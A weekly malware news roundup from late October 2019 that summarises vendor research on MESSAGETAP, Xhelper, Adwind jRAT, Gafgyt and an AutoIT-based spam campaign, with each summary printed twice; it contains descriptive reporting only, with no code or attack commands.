Malware Watch - W/E - 11/1/19
Chinese Spies Deploy MESSAGETAP Malware for Financially Motivated Intrusions (10/30/2019)
A new malware family dubbed "MESSAGETAP" monitors and saves SMS traffic from specific phone numbers, IMSI numbers, and keywords for financial gain. FireEye researchers said the tool was deployed by the Chinese-based APT41 threat actor in a telecommunications network provider in support of Chinese espionage efforts. MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script and is highly targeted as it contains a pre-defined list of phone and IMSI numbers. Once a device is infected, if an SMS message contains either a phone number or an IMSI number that matches the predefined list, it is saved to a CSV file for later theft by the threat actor.
A new malware family dubbed "MESSAGETAP" monitors and saves SMS traffic from specific phone numbers, IMSI numbers, and keywords for financial gain. FireEye researchers said the tool was deployed by the Chinese-based APT41 threat actor in a telecommunications network provider in support of Chinese espionage efforts. MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script and is highly targeted as it contains a pre-defined list of phone and IMSI numbers. Once a device is infected, if an SMS message contains either a phone number or an IMSI number that matches the predefined list, it is saved to a CSV file for later theft by the threat actor.
Malicious Xhelper App Infects More than 45,000 Devices (10/29/2019)
Symantec has observed a surge in detections for the malicious Xhelper app that can hide itself from users, download additional malicious apps, and display advertisements. The Android app is persistent. is able reinstall itself after users uninstall it, and is designed to stay hidden by not appearing on the system's launcher. The app has infected over 45,000 devices within a six-month period. Xhelper mainly targets users in India, Russia, and the US.
Symantec has observed a surge in detections for the malicious Xhelper app that can hide itself from users, download additional malicious apps, and display advertisements. The Android app is persistent. is able reinstall itself after users uninstall it, and is designed to stay hidden by not appearing on the system's launcher. The app has infected over 45,000 devices within a six-month period. Xhelper mainly targets users in India, Russia, and the US.
New Variant of Adwind jRAT Takes Aim at Windows, Chromium Browsers (10/29/2019)
Menlo Security researchers discovered a new variant of Adwind jRAT, a remote access Trojan that uses Java to take control and collect data from a user's machine--namely login credentials. The variant is attacking Windows machines and common Windows applications such as Explorer and Outlook as well as Chromium-based browsers, including Brave. The malware is a JAR file delivered from a link in a phishing email or downloaded from a legitimate site serving up insecure third-party content. Many infections surfaced from out-dated and illegitimate WordPress sites.
Menlo Security researchers discovered a new variant of Adwind jRAT, a remote access Trojan that uses Java to take control and collect data from a user's machine--namely login credentials. The variant is attacking Windows machines and common Windows applications such as Explorer and Outlook as well as Chromium-based browsers, including Brave. The malware is a JAR file delivered from a link in a phishing email or downloaded from a legitimate site serving up insecure third-party content. Many infections surfaced from out-dated and illegitimate WordPress sites.
SOHO Routers Abused by Gafgyt Botnet to Attack Gaming Servers (10/31/2019)
A new variant of the Gafgyt malware has been infecting small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. The Gafgyt variant competes with JenX and similar botnets. According to Palo Alto Networks, more than 32,000 WiFi routers are vulnerable to Gafgyt, which can exploit three vulnerabilities: a remote command injection on Zyxel P660HN; a remote code execution (RCE) found on Huawei's HG532; and an RCE in the Realtek RTL81XX chipset. Once infected, the devices are used to cause attacks on gaming servers, specifically Valve software protocols. Some attackers are taking aim at other servers that host popular games like Fortnite.
A new variant of the Gafgyt malware has been infecting small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. The Gafgyt variant competes with JenX and similar botnets. According to Palo Alto Networks, more than 32,000 WiFi routers are vulnerable to Gafgyt, which can exploit three vulnerabilities: a remote command injection on Zyxel P660HN; a remote code execution (RCE) found on Huawei's HG532; and an RCE in the Realtek RTL81XX chipset. Once infected, the devices are used to cause attacks on gaming servers, specifically Valve software protocols. Some attackers are taking aim at other servers that host popular games like Fortnite.
Spam Campaign Drops Dangerous AutoIT-Compiled Payloads (10/29/2019)
Trend Micro spotted a spam campaign that has AutoIT-compiled payloads, including the Trojan spy Agent Tesla and the remote access Trojan Ave Maria (also known as Warzone). The campaign uses AutoIT-obfuscated ISO image files as well as RAR- and LZH-compressed archive attachments to evade detection. ISO images can be used to bypass spam filters. The vendor observed this spam campaign being sent using a possibly compromised Web mail address.
Trend Micro spotted a spam campaign that has AutoIT-compiled payloads, including the Trojan spy Agent Tesla and the remote access Trojan Ave Maria (also known as Warzone). The campaign uses AutoIT-obfuscated ISO image files as well as RAR- and LZH-compressed archive attachments to evade detection. ISO images can be used to bypass spam filters. The vendor observed this spam campaign being sent using a possibly compromised Web mail address.